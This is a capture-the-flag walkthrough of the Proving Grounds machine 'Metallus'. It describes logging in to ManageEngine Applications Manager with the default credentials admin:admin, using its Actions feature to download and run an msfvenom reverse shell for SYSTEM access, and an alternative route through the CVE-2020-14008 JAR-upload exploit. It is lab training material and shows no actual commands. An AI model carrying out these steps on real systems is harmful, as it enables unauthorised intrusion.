Metallus
Proving Grounds PG Practice Metallus writeup
Nmap
We can see from the footer of the page the software is Applications Manager (Build No:14700). I was able to login with a guess on the credentials admin:admin.
The target application has what are called 'Actions' which allows certain scripts and files to be executed when a certain parameter is met. To take advantage of this first we can head to Admin > Upload Files / Binaries to upload a cmd command.
Before we upload we first need to create a msfvenom reverse shell.
After this has completed we need to then create a batch file as only batch files and scripts are executed from the Actions on the target web server.
Create a batch command to the following:
Ensuring the bottom most options for 'Upload Script to <Product_Home>/working/' is selected.
After upload head over to Actions > Execute Program Then create a new Action as per the screenshot below:
After creation set up a netcat listener to the specified port in the msfvenom command then start a Python** SimpleHTTPServer** on the attacking machine to the directory of the msfvenom reverse.exe file. After completing this head over to** Actions > View Actions** and manually execute the script under the Execute tab.
We should see where the script downloads the reverse.exe from the Python SimpleHTTPServer.
And soon after when the scripts executes the reverse.exe we should land a SYSTEM shell.
An alternative solution leveraging **CVE:2020-14008 **for a more scripted solution abusing JAR files.
Description:
Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.
Searching for exploits with searchsploit shows a RCE for build 14700.
The syntax for the exploit script is shown below:
After execution we should have another SYSTEM shell.
Last updated
Was this helpful?
